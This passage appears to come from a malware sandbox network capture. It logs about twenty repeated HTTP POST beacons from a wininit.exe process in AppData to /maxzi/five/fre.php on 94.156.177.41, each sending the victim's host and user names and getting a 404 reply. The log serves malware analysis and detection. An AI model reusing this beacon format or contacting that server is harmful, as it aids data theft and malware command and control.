                                                Nov 20, 2024 10:12:39.189868927 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:12:40.082314014 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:12:39 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                70192.168.2.224923894.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:12:40.229923010 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:12:40.238220930 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:12:40.998879910 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:12:40 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                71192.168.2.224923994.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:12:41.144229889 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:12:41.149833918 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:12:41.926178932 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:12:41 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                72192.168.2.224924094.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:12:42.070074081 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:12:42.075088978 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:12:42.939944983 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:12:42 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                73192.168.2.224924194.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:12:43.084049940 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:12:43.090775013 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:12:43.960422993 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:12:43 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                74192.168.2.224924294.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:12:44.314034939 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:12:44.335022926 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:12:45.162777901 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:12:45 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                75192.168.2.224924394.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:12:45.299447060 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:12:45.306056023 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:12:46.061624050 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:12:45 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                76192.168.2.224924494.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:12:46.221334934 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:12:46.228750944 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:12:46.951894999 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:12:46 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                77192.168.2.224924594.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:12:47.292335987 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:12:47.301018000 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:12:48.035159111 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:12:47 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                78192.168.2.224924694.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:12:48.193515062 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:12:48.198488951 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:12:48.943528891 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:12:48 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                79192.168.2.224924794.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:12:49.099790096 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:12:49.104815006 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:12:50.032990932 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:12:49 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                80192.168.2.224924894.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:12:50.254460096 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:12:50.259999037 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:12:50.995508909 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:12:50 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                81192.168.2.224924994.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:12:51.130161047 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:12:51.135097980 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:12:51.871305943 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:12:51 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                82192.168.2.224925094.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:12:52.054603100 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:12:52.064243078 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:12:52.935475111 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:12:52 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                83192.168.2.224925194.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:12:53.185000896 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:12:53.190103054 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:12:54.054186106 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:12:53 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                84192.168.2.224925294.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:12:54.191947937 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:12:54.198385954 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:12:55.067984104 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:12:54 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                85192.168.2.224925394.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:12:55.200165987 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:12:55.205372095 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:12:55.953423023 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:12:55 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                86192.168.2.224925494.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:12:56.115456104 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:12:56.120814085 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:12:56.843785048 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:12:56 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                87192.168.2.224925594.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:12:56.996800900 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:12:57.001730919 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:12:57.763031006 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:12:57 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                88192.168.2.224925694.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:12:57.903553963 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
                                                Nov 20, 2024 10:12:57.910681963 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                Nov 20, 2024 10:12:58.780607939 CET193INHTTP/1.1 404 Not Found
                                                Server: nginx/1.26.1
                                                Date: Wed, 20 Nov 2024 09:12:58 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Connection: close
                                                X-Powered-By: PHP/5.4.16
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                89192.168.2.224925794.156.177.4180772C:\Users\user\AppData\Roaming\wininit.exe
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:12:58.987746954 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: 94.156.177.41
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 9D963662
                                                Content-Length: 149
                                                Connection: close
